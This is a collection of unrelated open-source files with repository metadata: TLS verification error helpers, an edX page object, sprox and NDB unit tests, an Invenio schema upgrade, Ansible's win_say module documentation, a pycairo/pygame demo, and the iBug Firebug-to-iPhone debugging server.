int_from_bytes(data[pointer:pointer + 2]) extension_length = int_from_bytes(data[pointer + 2:pointer + 4]) yield ( extension_type, data[pointer + 4:pointer + 4 + extension_length] ) pointer += 4 + extension_length def raise_hostname(certificate, hostname): """ Raises a TLSVerificationError due to a hostname mismatch :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ is_ip = re.match('^\\d+\\.\\d+\\.\\d+\\.\\d+$', hostname) or hostname.find(':') != -1 if is_ip: hostname_type = 'IP address %s' % hostname else: hostname_type = 'domain name %s' % hostname message = 'Server certificate verification failed - %s does not match' % hostname_type valid_ips = ', '.join(certificate.valid_ips) valid_domains = ', '.join(certificate.valid_domains) if valid_domains: message += ' valid domains: %s' % valid_domains if valid_domains and valid_ips: message += ' or' if valid_ips: message += ' valid IP addresses: %s' % valid_ips raise TLSVerificationError(message, certificate) def raise_verification(certificate): """ Raises a generic TLSVerificationError :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ message = 'Server certificate verification failed' raise TLSVerificationError(message, certificate) def raise_weak_signature(certificate): """ Raises a TLSVerificationError when a certificate uses a weak signature algorithm :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ message = 'Server certificate verification failed - weak certificate signature algorithm' raise TLSVerificationError(message, certificate) def raise_client_auth(): """ Raises a TLSError indicating client authentication is required :raises: TLSError """ message = 'TLS handshake failed - client authentication required' raise TLSError(message) def raise_revoked(certificate): """ Raises a TLSVerificationError due to the certificate being revoked :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ message = 'Server certificate verification failed - certificate has been revoked' raise TLSVerificationError(message, certificate) def raise_no_issuer(certificate): """ Raises a TLSVerificationError due to no issuer certificate found in trust roots :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ message = 'Server certificate verification failed - certificate issuer not found in trusted root certificate store' raise TLSVerificationError(message, certificate) def raise_self_signed(certificate): """ Raises a TLSVerificationError due to a self-signed certificate roots :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ message = 'Server certificate verification failed - certificate is self-signed' raise TLSVerificationError(message, certificate) def raise_expired_not_yet_valid(certificate): """ Raises a TLSVerificationError due to certificate being expired, or not yet being valid :param certificate: An asn1crypto.x509.Certificate object :raises: TLSVerificationError """ validity = certificate['tbs_certificate']['validity'] not_after = validity['not_after'].native not_before = validity['not_before'].native now = datetime.now(timezone.utc) if not_before > now: formatted_before = not_before.strftime('%Y-%m-%d %H:%M:%SZ') message = 'Server certificate verification failed - certificate not valid until %s' % formatted_before elif not_after < now: formatted_after = not_after.strftime('%Y-%m-%d %H:%M:%SZ') message = 'Server certificate verification failed - certificate expired %s' % formatted_after raise TLSVerificationError(message, certificate) def raise_disconnection(): """ Raises a TLSError due to a disconnection :raises: TLSError """ raise TLSError('The remote end closed the connection') def raise_protocol_error(server_handshake_bytes): """ Raises a TLSError due to a protocol error :param server_handshake_bytes: A byte string of the handshake data received from the server :raises: TLSError """ other_protocol = detect_other_protocol(server_handshake_bytes) if other_protocol: raise TLSError('TLS protocol error - server responded using %s' % other_protocol) raise TLSError('TLS protocol error - server responded using a different protocol') def raise_handshake(): """ Raises a TLSError due to a handshake error :raises: TLSError """ raise TLSError('TLS handshake failed') def raise_dh_params(): """ Raises a TLSError due to weak DH params :raises: TLSError """ raise TLSError('TLS handshake failed - weak DH parameters') def detect_other_protocol(server_handshake_bytes): """ Looks at the server handshake bytes to try and detect a different protocol :param server_handshake_bytes: A byte string of the handshake data received from the server :return: None, or a unicode string of "ftp", "http", "imap", "pop3", "smtp" """ if server_handshake_bytes[0:5] == b'HTTP/': return 'HTTP' if server_handshake_bytes[0:4] == b'220 ': if re.match(b'^[^\r\n]*ftp', server_handshake_bytes, re.I): return 'FTP' else: return 'SMTP' if server_handshake_bytes[0:4] == b'220-': return 'FTP' if server_handshake_bytes[0:4] == b'+OK ': return 'POP3' if server_handshake_bytes[0:4] == b'* OK' or server_handshake_bytes[0:9] == b'* PREAUTH': return 'IMAP' return None
gpl-2.0
shubhdev/edx-platform
common/test/acceptance/pages/lms/course_nav.py
96
7770
""" Course navigation page object """ import re from bok_choy.page_object import PageObject from bok_choy.promise import EmptyPromise class CourseNavPage(PageObject): """ Navigate sections and sequences in the courseware. """ url = None def is_browser_on_page(self): return self.q(css='div.course-index').present @property def sections(self): """ Return a dictionary representation of sections and subsections. Example: { 'Introduction': ['Course Overview'], 'Week 1': ['Lesson 1', 'Lesson 2', 'Homework'] 'Final Exam': ['Final Exam'] } You can use these titles in `go_to_section` to navigate to the section. """ # Dict to store the result nav_dict = dict() section_titles = self._section_titles() # Get the section titles for each chapter for sec_index, sec_title in enumerate(section_titles): if len(section_titles) < 1: self.warning("Could not find subsections for '{0}'".format(sec_title)) else: # Add one to convert list index (starts at 0) to CSS index (starts at 1) nav_dict[sec_title] = self._subsection_titles(sec_index + 1) return nav_dict @property def sequence_items(self): """ Return a list of sequence items on the page. Sequence items are one level below subsections in the course nav. Example return value: ['Chemical Bonds Video', 'Practice Problems', 'Homework'] """ seq_css = 'ol#sequence-list>li>a>p' return self.q(css=seq_css).map(self._clean_seq_titles).results def go_to_section(self, section_title, subsection_title): """ Go to the section in the courseware. Every section must have at least one subsection, so specify both the section and subsection title. Example: go_to_section("Week 1", "Lesson 1") """ # For test stability, disable JQuery animations (opening / closing menus) self.browser.execute_script("jQuery.fx.off = true;") # Get the section by index try: sec_index = self._section_titles().index(section_title) except ValueError: self.warning("Could not find section '{0}'".format(section_title)) return # Click the section to ensure it's open (no harm in clicking twice if it's already open) # Add one to convert from list index to CSS index section_css = 'nav>div.chapter:nth-of-type({0})>h3>a'.format(sec_index + 1) self.q(css=section_css).first.click() # Get the subsection by index try: subsec_index = self._subsection_titles(sec_index + 1).index(subsection_title) except ValueError: msg = "Could not find subsection '{0}' in section '{1}'".format(subsection_title, section_title) self.warning(msg) return # Convert list indices (start at zero) to CSS indices (start at 1) subsection_css = "nav>div.chapter:nth-of-type({0})>ul>li:nth-of-type({1})>a".format( sec_index + 1, subsec_index + 1 ) # Click the subsection and ensure that the page finishes reloading self.q(css=subsection_css).first.click() self._on_section_promise(section_title, subsection_title).fulfill() def go_to_sequential(self, sequential_title): """ Within a section/subsection, navigate to the sequential with `sequential_title`. """ # Get the index of the item in the sequence all_items = self.sequence_items try: seq_index = all_items.index(sequential_title) except ValueError: msg = "Could not find sequential '{0}'. Available sequentials: [{1}]".format( sequential_title, ", ".join(all_items) ) self.warning(msg) else: # Click on the sequence item at the correct index # Convert the list index (starts at 0) to a CSS index (starts at 1) seq_css = "ol#sequence-list>li:nth-of-type({0})>a".format(seq_index + 1) self.q(css=seq_css).first.click() def _section_titles(self): """ Return a list of all section titles on the page. """ chapter_css = 'nav > div.chapter > h3 > a' return self.q(css=chapter_css).map(lambda el: el.text.strip()).results def _subsection_titles(self, section_index): """ Return a list of all subsection titles on the page for the section at index `section_index` (starts at 1). """ # Retrieve the subsection title for the section # Add one to the list index to get the CSS index, which starts at one subsection_css = 'nav>div.chapter:nth-of-type({0})>ul>li>a>p:nth-of-type(1)'.format(section_index) # If the element is visible, we can get its text directly # Otherwise, we need to get the HTML # It *would* make sense to always get the HTML, but unfortunately # the open tab has some child <span> tags that we don't want. return self.q( css=subsection_css ).map( lambda el: el.text.strip().split('\n')[0] if el.is_displayed() else el.get_attribute('innerHTML').strip() ).results def _on_section_promise(self, section_title, subsection_title): """ Return a `Promise` that is fulfilled when the user is on the correct section and subsection. """ desc = "currently at section '{0}' and subsection '{1}'".format(section_title, subsection_title) return EmptyPromise( lambda: self._is_on_section(section_title, subsection_title), desc ) def _is_on_section(self, section_title, subsection_title): """ Return a boolean indicating whether the user is on the section and subsection with the specified titles. This assumes that the currently expanded section is the one we're on That's true right after we click the section/subsection, but not true in general (the user could go to a section, then expand another tab). """ current_section_list = self.q(css='nav>div.chapter.is-open>h3>a').text current_subsection_list = self.q(css='nav>div.chapter.is-open li.active>a>p').text if len(current_section_list) == 0: self.warning("Could not find the current section") return False elif len(current_subsection_list) == 0: self.warning("Could not find current subsection") return False else: return ( current_section_list[0].strip() == section_title and current_subsection_list[0].strip().split('\n')[0] == subsection_title ) # Regular expression to remove HTML span tags from a string REMOVE_SPAN_TAG_RE = re.compile(r'<span.+/span>') def _clean_seq_titles(self, element): """ Clean HTML of sequence titles, stripping out span tags and returning the first line. """ return self.REMOVE_SPAN_TAG_RE.sub('', element.get_attribute('innerHTML')).strip().split('\n')[0] def go_to_sequential_position(self, sequential_position): """ Within a section/subsection navigate to the sequential position specified by `sequential_position`. Arguments: sequential_position (int): position in sequential bar """ sequential_position_css = '#tab_{0}'.format(sequential_position - 1) self.q(css=sequential_position_css).first.click()
agpl-3.0
gjhiggins/sprox
tests/test_saormprovider.py
1
13417
from nose import SkipTest from sprox.sa.provider import SAORMProvider from sprox.test.base import setup_database, setup_records, SproxTest from sprox.test.model import * from sprox.sa.widgetselector import SAWidgetSelector import sqlalchemy from sqlalchemy.orm import mapper, lazyload from sqlalchemy import MetaData, Table, Column, Integer from sqlalchemy.engine import Engine from nose.tools import raises, eq_ import datetime from cgi import FieldStorage from io import StringIO session = None engine = None connection = None trans = None def setup(): global session, engine, metadata, trans session, engine, metadata = setup_database() class DummyEngine(Engine): def __init__(self): pass url = 'dummy!' other_engine = DummyEngine() other_metadata = MetaData(bind=other_engine) class OtherClass(object):pass other_table = Table('other_table', other_metadata, Column('other_id', Integer, primary_key=True)) mapper(OtherClass, other_table) class TestSAORMProvider(SproxTest): def setup(self): super(TestSAORMProvider, self).setup() self.provider = SAORMProvider(session) session.add(Department(department_id=1, name='Marketing')) session.add(Department(department_id=2, name='Accounting')) session.add(DocumentCategory(document_category_id=1, department_id=1, name='Brochure')) session.add(DocumentCategory(document_category_id=2, department_id=1, name='Flyer')) session.add(DocumentCategory(document_category_id=3, department_id=2, name='Balance Sheet')) session.add(Permission(permission_name='perm')) #session.add(DocumentRating(user_id=1, document_id=1, rating=5)) self.provider.flush() def test_get_fields_with_func(self): eq_(self.provider.get_fields(lambda: Town), ['town_id', 'name', 'town_id', 'name']) def test_isbinary_related(self): assert not self.provider.is_binary(User, 'groups') def test_isrelation_onproperty(self): assert not self.provider.is_relation(User, 'permissions') def test_is_query_not_a_query(self): assert self.provider.is_query(User, None) == False def test_is_query_with_dynamic(self): e = session.query(Permission).first() assert self.provider.is_query(Permission, e.groups) == True def test_isbinary_synonym(self): assert not self.provider.is_binary(User, 'password') assert self.provider.is_binary(File, 'content') def test_isstring(self): assert self.provider.is_string(User, 'email_address') assert not self.provider.is_string(User, 'groups') def test_isstring_synonym(self): assert self.provider.is_string(User, 'password') def test_binary_create(self): from io import BytesIO fs = FieldStorage() fs.file = BytesIO(b'fake_content') values = {'data':fs} self.provider.create(File, values) def test_binary_update(self): from io import BytesIO fs = FieldStorage() fs.file = BytesIO(b'fake_content') values = {'data':fs} entity = self.provider.create(File, values) values = {'data':fs, 'file_id':entity.file_id} self.provider.update(File, values) def test_create_with_engine(self): provider = SAORMProvider(engine) assert provider.engine == engine def test_create_with_metadata(self): provider = SAORMProvider(metadata) assert provider.engine == engine def test_create_with_session(self): provider = SAORMProvider(session) assert provider.engine == engine def test_get_entity(self): entity = self.provider.get_entity('User') assert entity == User @raises(KeyError) def test_get_entity_non_matching_engine(self): entity = self.provider.get_entity('OtherClass') def test_get_primary_fields(self): fields = self.provider.get_primary_fields(User) eq_(fields, ['user_id']) def test_get_primary_fields_multi(self): fields = self.provider.get_primary_fields(DocumentCategory) eq_(fields, ['document_category_id', 'department_id']) def test_get_primary_field_function(self): field = self.provider.get_primary_field(lambda: User) eq_(field, 'user_id') def test_get_view_field_name(self): field = self.provider.get_view_field_name(Group, ['name']) eq_(field, 'group_name') def test_get_view_field_name_with_title(self): """ if it exists, saormprovider should use the 'title' info attribute to determine the title column """ field = self.provider.get_view_field_name(User, ['name']) eq_(field, 'email_address') def test_get_view_field_name_not_found(self): field = self.provider.get_view_field_name(Group, []) eq_(field, 'group_id') def test_get_dropdown_options_fk(self): options = self.provider.get_dropdown_options(User, 'town') eq_(options, [(1, 'Arvada'), (2, 'Denver'), (3, 'Golden'), (4, 'Boulder')]) def test_get_dropdown_options_fk_multi(self): options = self.provider.get_dropdown_options(Document, 'category') eq_(options, [('1/1', 'Brochure'), ('2/1', 'Flyer'), ('3/2', 'Balance Sheet')]) def test_get_dropdown_options_join(self): options = self.provider.get_dropdown_options(User, 'groups') eq_(options, [(1, '0'), (2, '1'), (3, '2'), (4, '3'), (5, '4')]) def test_get_dropdown_options_join_2(self): options = self.provider.get_dropdown_options(Group, 'users') eq_(options, [(1, 'asdf@asdf.com'),]) def test_dropdown_options_warn(self): provider = SAORMProvider(metadata) options = provider.get_dropdown_options(User, 'town') eq_(options, []) def test_get_relations(self): relations = self.provider.get_relations(User) eq_(relations, ['town', 'groups']) def test_get_synonyms(self): synonyms = self.provider.get_synonyms(User) eq_(synonyms, ['password']) def test_dictify(self): d = self.provider.dictify(self.user) eq_(d['groups'], [5]) eq_(d['user_name'], 'asdf') def test_dictify_limit_fields(self): d = self.provider.dictify(self.user, fields=['user_name']) eq_(d['user_name'], 'asdf') eq_(list(d.keys()), ['user_name']) def test_dictify_omit_fields(self): d = self.provider.dictify(self.user, omit_fields=['password', '_password']) assert 'password' not in list(d.keys()) assert '_password' not in list(d.keys()) assert 'user_name' in list(d.keys()) def test_dictify_dynamic_relation(self): e = session.query(Permission).first() d = self.provider.dictify(e) assert isinstance(d['groups'], list) def test_dictify_none(self): d = self.provider.dictify(None) eq_(d, {}) def test_create(self): params = {'user_name':'asdf2', 'password':'asdf2', 'email_address':'email@addy.com', 'groups':[1,4], 'town':2} new_user = self.provider.create(User, params) q_user = self.session.query(User).get(2) assert q_user == new_user def test_create_many_to_one_multi(self): params = {'category': '1/1'} new_ref = self.provider.create(DocumentCategoryReference, params) q_ref = self.session.query(DocumentCategoryReference).get(1) assert new_ref == q_ref def test_create_many_to_many_multi(self): params = {'categories': ['1/1', '1/2']} new_ratingref = self.provider.create(DocumentCategoryTag, params) q_ratingref = self.session.query(DocumentCategoryTag).get(1) assert new_ratingref == q_ratingref def test_query(self): r = self.provider.query(User, limit=20, offset=0) eq_(len(r), 2) def test_query_order_by(self): r = self.provider.query(Document, limit=20, offset=0, order_by='category') eq_(len(r), 2) def test_query_filters(self): cnt, r = self.provider.query(Town, filters={'name':'Golden'}) eq_([t.name for t in r], ['Golden']) def test_query_filters_relations(self): cnt, r = self.provider.query(User, filters={'town':1}) assert r[0].town.town_id == 1, r def test_query_filters_relations_many(self): cnt, r = self.provider.query(User, filters={'groups':[5]}) assert r[0].groups[0].group_id == 5, r def test_query_filters_substring(self): cnt, r = self.provider.query(Town, filters={'name':'old'}, substring_filters=['name']) eq_([t.name for t in r], ['Golden']) def test_query_filters_substring_escaping(self): cnt, r = self.provider.query(Town, filters={'name':'o%l%d'}, substring_filters=['name']) eq_(r, []) def test_query_filters_substring_notstring(self): cnt, towns = self.provider.query(Town) cnt, r = self.provider.query(Town, filters={'town_id':towns[0].town_id}, substring_filters=['town_id']) eq_([t.name for t in r], [towns[0].name]), r cnt, r = self.provider.query(Town, filters={'town_id':'not-an-id'}, substring_filters=['town_id']) eq_(r, []), r def test_query_filters_substring_insensitive(self): cnt, r = self.provider.query(Town, filters={'name':'gold'}, substring_filters=['name']) eq_([t.name for t in r], ['Golden']) def test_query_filters_substring_disabled(self): cnt, r = self.provider.query(Town, filters={'name':'old'}, substring_filters=[]) eq_(r, []) def test_update(self): params = {'user_name':'asdf2', 'password':'asdf2', 'email_address':'email@addy.com', 'groups':[1,4], 'town':2} new_user = self.provider.create(User, params) params['email_address'] = 'asdf@asdf.commy' params['created'] = '2008-3-30 12:21:21' params['user_id'] = 2 new_user = self.provider.update(User, params) q_user = self.session.query(User).get(2) eq_(new_user.email_address, 'asdf@asdf.commy') def test_update_omit(self): params = {'user_name':'asdf2', 'password':'asdf2', 'email_address':'email@addy.com', 'groups':[1,4], 'town':2} new_user = self.provider.create(User, params) params = {} params['email_address'] = 'asdf@asdf.commy' params['created'] = '2008-3-30 12:21:21' params['user_id'] = 2 new_user = self.provider.update(User, params, omit_fields=['email_address', 'groups']) q_user = self.session.query(User).get(2) eq_(q_user.email_address, 'email@addy.com') eq_([group.group_id for group in q_user.groups], [1,4]) def test_get_default_values(self): assert {} == self.provider.get_default_values(User, {}) def test_get(self): user = self.provider.get(User, params={'user_id':1}) eq_(user['user_name'], 'asdf') def test_delete(self): #causes some kind of persistence error in SA 0.7 (rollback not working) if sqlalchemy.__version__ > '0.6.6': raise SkipTest user = self.provider.delete(User, params={'user_id':1}) users = self.session.query(User).all() assert len(users) == 0 def test_modify_params_for_datetimes(self): params = self.provider._modify_params_for_dates(Example, {'datetime_': '1978-8-29 12:34:56'}) eq_(params, {'datetime_': datetime.datetime(1978, 8, 29, 12, 34, 56)}) def test_modify_params_for_dates(self): params = self.provider._modify_params_for_dates(Example, {'date_': '1978-8-29'}) eq_(params, {'date_': datetime.date(1978, 8, 29)}) def test_modify_params_for_intervals(self): params = self.provider._modify_params_for_dates(Example, {'interval': '1 days, 3:20:01'}) eq_(params, {'interval': datetime.timedelta(days=1, hours=3, minutes=20, seconds=1)}) def test_modify_params_for_relationships_params_with_instance_already(self): group = self.session.query(Group).get(1) params = {'groups':group} params = self.provider._modify_params_for_relationships(User, params) assert params['groups'] == [group], params def test_get_field_widget_args(self): a = self.provider.get_field_widget_args(User, 'groups', User.groups) eq_(a, {'nullable': False, 'provider': self.provider}) def test_create_with_unicode_cast_to_int(self): self.provider.create(User, dict(user_id='34', user_name='something')) def test_create_relationships_with_wacky_relation(self): obj = session.query(Group).first() params = {'group_id':obj.group_id, 'users':1} self.provider.update(Group, params) user = session.query(User).get(1) assert user in obj.users def test_create_relationships_remove_groups(self): obj = session.query(Group).first() obj.users.append(self.user) self.provider.update(User, {'user_id':self.user.user_id, 'groups':[]}) session.flush() user = session.query(User).get(1) assert user not in obj.users def test_create_relationships_remove_town(self): town = session.query(Town).first() self.user.town = town self.session.flush() self.provider.update(User, {'user_id':self.user.user_id, 'town':None}) assert self.user.town is None
mit
egabancho/invenio-upgrader
invenio_upgrader/upgrades/invenio_2015_03_03_tag_value.py
20
1475
# -*- coding: utf-8 -*- # # This file is part of Invenio. # Copyright (C) 2015 CERN. # # Invenio is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; either version 2 of the # License, or (at your option) any later version. # # Invenio is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Invenio; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. """Modifies column `tag.value`.""" from invenio.legacy.dbquery import run_sql depends_on = ['invenio_2012_11_15_hstRECORD_marcxml_longblob'] def info(): """Return upgrade recipe information.""" return "Modifies column tag.value" def do_upgrade(): """Carry out the upgrade.""" create_statement = run_sql('SHOW CREATE TABLE tag')[0][1] if 'affected_fields' not in create_statement: run_sql("ALTER TABLE tag MODIFY COLUMN value VARCHAR(6) default ''") def estimate(): """Estimate running time of upgrade in seconds (optional).""" return 1 def pre_upgrade(): """Pre-upgrade checks.""" pass def post_upgrade(): """Post-upgrade checks.""" pass
gpl-2.0
wrouesnel/ansible
lib/ansible/modules/windows/win_say.py
47
4581
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2016, Jon Hawkesworth (@jhawkesworth) <figs@unity.demon.co.uk> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # this is a windows documentation stub. actual code lives in the .ps1 # file of the same name ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = r''' --- module: win_say version_added: "2.3" short_description: Text to speech module for Windows to speak messages and optionally play sounds description: - Uses .NET libraries to convert text to speech and optionally play .wav sounds. Audio Service needs to be running and some kind of speakers or headphones need to be attached to the windows target(s) for the speech to be audible. options: msg: description: - The text to be spoken. - Use either C(msg) or C(msg_file). - Optional so that you can use this module just to play sounds. msg_file: description: - Full path to a windows format text file containing the text to be spokend. - Use either C(msg) or C(msg_file). - Optional so that you can use this module just to play sounds. voice: description: - Which voice to use. See notes for how to discover installed voices. - If the requested voice is not available the default voice will be used. Example voice names from Windows 10 are C(Microsoft Zira Desktop) and C(Microsoft Hazel Desktop). default: system default voice speech_speed: description: - How fast or slow to speak the text. - Must be an integer value in the range -10 to 10. - -10 is slowest, 10 is fastest. default: 0 start_sound_path: description: - Full path to a C(.wav) file containing a sound to play before the text is spoken. - Useful on conference calls to alert other speakers that ansible has something to say. end_sound_path: description: - Full path to a C(.wav) file containing a sound to play after the text has been spoken. - Useful on conference calls to alert other speakers that ansible has finished speaking. author: - Jon Hawkesworth (@jhawkesworth) notes: - Needs speakers or headphones to do anything useful. - | To find which voices are installed, run the following Powershell commands. Add-Type -AssemblyName System.Speech $speech = New-Object -TypeName System.Speech.Synthesis.SpeechSynthesizer $speech.GetInstalledVoices() | ForEach-Object { $_.VoiceInfo } $speech.Dispose() - Speech can be surprisingly slow, so it's best to keep message text short. ''' EXAMPLES = r''' - name: Warn of impending deployment win_say: msg: Warning, deployment commencing in 5 minutes, please log out. - name: Using a different voice and a start sound win_say: start_sound_path: C:\Windows\Media\ding.wav msg: Warning, deployment commencing in 5 minutes, please log out. voice: Microsoft Hazel Desktop - name: With start and end sound win_say: start_sound_path: C:\Windows\Media\Windows Balloon.wav msg: New software installed end_sound_path: C:\Windows\Media\chimes.wav - name: Text from file example win_say: start_sound_path: C:\Windows\Media\Windows Balloon.wav msg_file: AppData\Local\Temp\morning_report.txt end_sound_path: C:\Windows\Media\chimes.wav ''' RETURN = r''' message_text: description: the text that the module attempted to speak returned: success type: string sample: "Warning, deployment commencing in 5 minutes." voice: description: the voice used to speak the text. returned: success type: string sample: Microsoft Hazel Desktop voice_info: description: the voice used to speak the text. returned: when requested voice could not be loaded type: string sample: Could not load voice TestVoice, using system default voice '''
gpl-3.0
gistnetserv-uah/eTorii
eGA3/pycairo/test/pygame-test2.py
10
1075
#!/usr/bin/env python """demonstrate pycairo and pygame method1: use an intermediate Python array object """ import array import math import sys import cairo import pygame def draw(surface): x,y, radius = (250,250, 200) ctx = cairo.Context(surface) ctx.set_line_width(15) ctx.arc(x, y, radius, 0, 2.0 * math.pi) ctx.set_source_rgb(0.8, 0.8, 0.8) ctx.fill_preserve() ctx.set_source_rgb(1, 1, 1) ctx.stroke() def input(events): for event in events: if event.type == pygame.QUIT: sys.exit(0) else: print event Width, Height = 512, 512 data = array.array('c', chr(0) * Width * Height * 4) stride = Width * 4 surface = cairo.ImageSurface.create_for_data(data, cairo.FORMAT_ARGB32,Width, Height, stride) pygame.init() window = pygame.display.set_mode( (Width,Height) ) screen = pygame.display.get_surface() draw(surface) #Create PyGame surface from Cairo Surface image = pygame.image.frombuffer(data.tostring(),(Width,Height),"ARGB",) #Tranfer to Screen screen.blit(image, (0,0)) pygame.display.flip() while True: input(pygame.event.get())
apache-2.0
johan/firebug
ibug/ibug.py
1
5421
from urlparse import urlparse from cgi import parse_qs from urllib import unquote import signal, thread, threading, time import BaseHTTPServer, SocketServer, mimetypes # ************************************************************************************************** # Globals global done, server, consoleCommand, phoneResponse done = False server = None phoneResponseEvent = threading.Event() consoleEvent = threading.Event() webPort = 1840 # ************************************************************************************************** class WebServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer): pass class WebRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(self): #print "%s" % self.path host, path, params, query = parseURL(self.path) if path == "/command": postConsoleCommand(query.get("message")) response = waitForPhoneResponse() self.respond(200, "application/x-javascript") self << response elif path == "/response": postPhoneResponse(query.get("message")) elif path == "/browser": self.respond(200, "text/html") self << getFormattedFile("browser.html") self.wfile.flush() while 1: message = waitForPhoneResponse() self << "<script>command('%s')</script>" % escapeJavaScript(message) self.wfile.flush() elif path == "/phone": self.respond(200, "text/html") self << getFormattedFile("phone.html") self.wfile.flush() while 1: message = waitForConsoleCommand() self << "<script>command('%s')</script>" % escapeJavaScript(message) self.wfile.flush() elif path == "/ibug.js": header = "var ibugHost = '%(hostName)s:%(port)s';" % getHostInfo() self.sendFile("ibug.js", header=header) else: self.sendFile(path[1:]) def respond(self, code=200, mimeType="text/plain"): self << "HTTP/1.1 %s %s\n" % (code, "OK") self << "Content-Type: %s\n" % mimeType self << "\n" def sendFile(self, path, mimeType=None, header=None): if not mimeType: mimeType = mimetypes.guess_type(path)[0] self.respond(200, mimeType) if header: self << header self << file(path).read() def __lshift__(self, text): self.wfile.write(text) # ************************************************************************************************** def serve(): print "Paste this code into the <head> of all HTML that will run on your iPhone:" print getFormattedFile("embed.html", getHostInfo()) url = "http://%(hostName)s:%(port)s/firebug.html" % getHostInfo() print "Load this page in your browser:\n" print " %s" % url print "\nFirebug server is running..." signal.signal(signal.SIGINT, terminate) # Run the server on a separate thread thread.start_new_thread(runServer, ()) global done while not done: try: time.sleep(0.3) except IOError: pass global server server.server_close() def runServer(): global server server = WebServer(("", webPort), WebRequestHandler) server.allow_reuse_address = True server.serve_forever() def terminate(sig_num, frame): global done done = True # ************************************************************************************************** def postConsoleCommand(message): global consoleCommand consoleCommand = message consoleEvent.set() def waitForConsoleCommand(): consoleEvent.wait() consoleEvent.clear() global consoleCommand return consoleCommand def postPhoneResponse(message): global phoneResponse phoneResponse = message phoneResponseEvent.set() def waitForPhoneResponse(): phoneResponseEvent.wait() phoneResponseEvent.clear() global phoneResponse return phoneResponse # ************************************************************************************************** def parseURL(url): """ Parses a URL into a tuple (host, path, args) where args is a dictionary.""" scheme, host, path, params, query, hash = urlparse(url) if not path: path = "/" args = parse_qs(query) escapedArgs = {} for name in args: if len(args[name]) == 1: escapedArgs[unquote(name)] = unquote(args[name][0]) else: escapedArgs[unquote(name)] = escapedSet = [] for item in args[name]: escapedSet.append(unquote(item)) return host, path, params, escapedArgs def escapeJavaScript(text): return text.replace("'", "\\'").replace("\n", "\\n").replace("\r", "") def getFormattedFile(path, args={}): return file(path).read() % args def getHostInfo(): import socket s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("getfirebug.com", 80)) hostName = s.getsockname()[0] s.close() return {"hostName": hostName, "port": webPort} # ************************************************************************************************** if __name__ == "__main__": serve()
bsd-3-clause
jonparrott/gcloud-python
ndb/tests/unit/test__datastore_types.py
4
2604
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest.mock import pytest from google.cloud.ndb import _datastore_types from google.cloud.ndb import exceptions class TestBlobKey: @staticmethod def test_constructor_bytes(): value = b"abc" blob_key = _datastore_types.BlobKey(value) assert blob_key._blob_key is value @staticmethod def test_constructor_none(): blob_key = _datastore_types.BlobKey(None) assert blob_key._blob_key is None @staticmethod def test_constructor_too_long(): value = b"a" * 2000 with pytest.raises(exceptions.BadValueError): _datastore_types.BlobKey(value) @staticmethod def test_constructor_bad_type(): value = {"a": "b"} with pytest.raises(exceptions.BadValueError): _datastore_types.BlobKey(value) @staticmethod def test___eq__(): blob_key1 = _datastore_types.BlobKey(b"abc") blob_key2 = _datastore_types.BlobKey(b"def") blob_key3 = _datastore_types.BlobKey(None) blob_key4 = b"ghi" blob_key5 = unittest.mock.sentinel.blob_key assert blob_key1 == blob_key1 assert not blob_key1 == blob_key2 assert not blob_key1 == blob_key3 assert not blob_key1 == blob_key4 assert not blob_key1 == blob_key5 @staticmethod def test___lt__(): blob_key1 = _datastore_types.BlobKey(b"abc") blob_key2 = _datastore_types.BlobKey(b"def") blob_key3 = _datastore_types.BlobKey(None) blob_key4 = b"ghi" blob_key5 = unittest.mock.sentinel.blob_key assert not blob_key1 < blob_key1 assert blob_key1 < blob_key2 with pytest.raises(TypeError): blob_key1 < blob_key3 assert blob_key1 < blob_key4 with pytest.raises(TypeError): blob_key1 < blob_key5 @staticmethod def test___hash__(): value = b"289399038904ndkjndjnd02mx" blob_key = _datastore_types.BlobKey(value) assert hash(blob_key) == hash(value)
apache-2.0
analyseuc3m/ANALYSE-v1
common/djangoapps/terrain/stubs/tests/test_edxnotes.py
23
11674
